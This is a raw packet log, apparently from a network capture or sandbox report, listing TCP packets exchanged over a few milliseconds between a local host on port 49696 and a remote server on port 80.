Jan 4, 2023 16:47:45.454336882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454381943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454384089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454427958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454433918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454464912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454474926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454505920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454510927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454543114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454550028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454583883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454588890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454628944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454632998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454677105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454678059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454727888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454754114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454799891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454801083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454849958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454852104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454899073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454899073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454946995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.454947948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454998016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.454998970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455045938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455049992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455100060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455104113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455147028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455147982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455198050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455202103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455241919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455244064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455290079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455290079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455334902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455338955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455390930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455393076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455436945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455437899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455483913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455483913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455529928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455532074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455579996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455579996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455621004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455635071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455658913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455667973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455704927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455705881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455746889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455751896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455770969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455796957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455821037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455821991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455867052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455868959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455914021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455915928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455954075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455962896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.455986977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.455996990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456020117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456032038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456063032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456065893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456109047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456110001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456156015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456156969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456199884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456203938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456248999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456250906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456299067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456300020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456345081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456345081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456383944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456391096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456418037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456429958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456465006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456470013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456501007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456526995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456535101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456548929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456579924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456615925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456624985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456655025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456669092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456669092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456710100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456712961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456744909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456751108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456779957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456788063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456820965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456835985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456856012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456865072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456890106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456897020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456926107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456932068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456959963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.456965923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.456995964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457000971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457030058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457036972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457065105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457071066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457108021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457115889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457159042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457181931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457195044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457201004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457231045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457237959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457268000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457278013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457310915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457354069 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457391977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457396984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457426071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457434893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457462072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457467079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457496881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457503080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457531929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457536936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457570076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457575083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457606077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457614899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457644939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457647085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457673073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457683086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457716942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457724094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457768917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457775116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457815886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457840919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457859039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457860947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457896948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457901955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457933903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.457942009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457979918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.457987070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458028078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458029032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458069086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458070993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458113909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458128929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458172083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458174944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458209991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458216906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458252907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458254099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458296061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458297014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458321095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458338976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458365917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458372116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458416939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458422899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458467960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458475113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458517075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458523989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458561897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458566904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458611012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458611965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458653927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458656073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458702087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458786964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458833933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458836079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458877087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458890915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458935976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458936930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.458980083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.458982944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459024906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459038973 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459080935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459081888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459124088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459126949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459167957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459177971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459222078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459223032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459258080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459268093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459292889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459300995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459327936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459335089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459386110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459391117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459430933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459430933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459472895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459475040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459516048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459521055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459563971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459566116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459604979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459613085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459649086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459657907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459686995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459690094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459728956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459731102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459769964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459773064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459816933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459816933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459861040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459867001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459909916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459916115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.459959984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.459964991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460007906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460014105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460055113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460061073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460103989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460112095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460154057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460160971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460205078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460207939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460253954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460257053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460300922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460308075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460351944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460355997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460398912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460405111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460450888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460458040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460500002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460510015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460555077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460556030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460599899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460607052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460650921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460659027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460706949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460732937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460743904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460752964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460779905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460783958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460822105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460824966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460849047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460867882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460896015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460901022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460944891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460948944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.460993052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.460994959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461036921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461040020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461071968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461080074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461107016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461110115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461150885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461154938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461199999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461206913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461251974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461256027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461299896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461306095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461349010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461354017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461397886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461404085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461447001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461451054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461484909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461493969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461522102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461524963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461558104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461563110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461594105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461600065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461631060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461641073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461671114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461679935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461716890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461720943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461760044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461832047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461878061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461893082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461929083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.461940050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461965084 CET	80	49696	66.235.200.147	192.168.2.4
